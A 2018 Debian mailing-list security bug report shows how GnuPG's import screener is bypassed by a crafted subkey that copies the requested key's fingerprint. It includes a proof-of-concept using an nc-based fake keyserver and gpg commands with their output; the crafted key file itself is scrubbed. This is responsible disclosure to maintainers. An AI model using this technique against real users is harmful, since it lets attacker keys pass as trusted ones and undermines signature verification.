[pkg-gnupg-maint] Bug#909755: gnupg: import screener bypass via crafted subkey

Jakub Wilk jwilk at jwilk.net
Thu Sep 27 18:37:08 BST 2018 

Package: gnupg
Version: 2.1.18-8~deb9u2
Tags: security

To fix #725411, an import screener was implemented, which rejects keys 
with fingerprints other than those that were requested by user.

Unfortunately, it's possible to bypass the import screener by appending 
a crafted subkey to an arbitrary key:

   $ gpg --keyserver keyserver.ubuntu.com --recv-key 0EE5BE979282D80B9F7540F1CCD2ED94D21739E9
   gpg: key CCD2ED94D21739E9: public key "Daniel Kahn Gillmor <dkg at fifthhorseman.net>" imported
   gpg: no ultimately trusted keys found
   gpg: Total number processed: 1
   gpg:               imported: 1

   $ (printf 'HTTP/1.0 200 OK\n\n'; cat fakeCCD2ED94D21739E9.pgp) | nc.openbsd -N -l -p 11371 > /dev/null &  # poor man's malicious key server

   $ gpg --keyserver localhost --recv-key 0EE5BE979282D80B9F7540F1CCD2ED94D21739E9
   gpg: key 60B0EEAA28CB19E1: "Totally Legit Signing Key <mallory at example.org>" not changed
   gpg: Total number processed: 1
   gpg:              unchanged: 1

   $ gpg --list-packets fakeCCD2ED94D21739E9.pgp | tail -n6
   # off=402 ctb=b9 tag=14 hlen=3 plen=525
   :public sub key packet:
           version 4, algo 1, created 1180812858, expires 0
           pkey[0]: [4096 bits]
           pkey[1]: [17 bits]
           keyid: CCD2ED94D21739E9

The subkey was made by taking the original key's public key and changing 
the packet's tag, so it has the same fingerprint as the original key.


-- System Information:
Architecture: amd64

Versions of packages gnupg depends on:
ii  gnupg-agent    2.1.18-8~deb9u2
ii  libassuan0     2.4.3-2
ii  libbz2-1.0     1.0.6-8.1
ii  libc6          2.24-11+deb9u3
ii  libgcrypt20    1.7.6-2+deb9u3
ii  libgpg-error0  1.26-2
ii  libksba8       1.3.5-2
ii  libreadline7   7.0-3
ii  libsqlite3-0   3.16.2-5+deb9u1
ii  zlib1g         1:1.2.8.dfsg-5

Versions of packages gnupg recommends:
ii  dirmngr     2.1.18-8~deb9u2
pn  gnupg-l10n  <none>

-- 
Jakub Wilk
-------------- next part --------------
A non-text attachment was scrubbed...
Name: fakeCCD2ED94D21739E9.pgp
Type: application/octet-stream
Size: 930 bytes
Desc: not available
URL: <http://alioth-lists.debian.net/pipermail/pkg-gnupg-maint/attachments/20180927/7a6bab81/attachment.obj>

More information about the pkg-gnupg-maint mailing list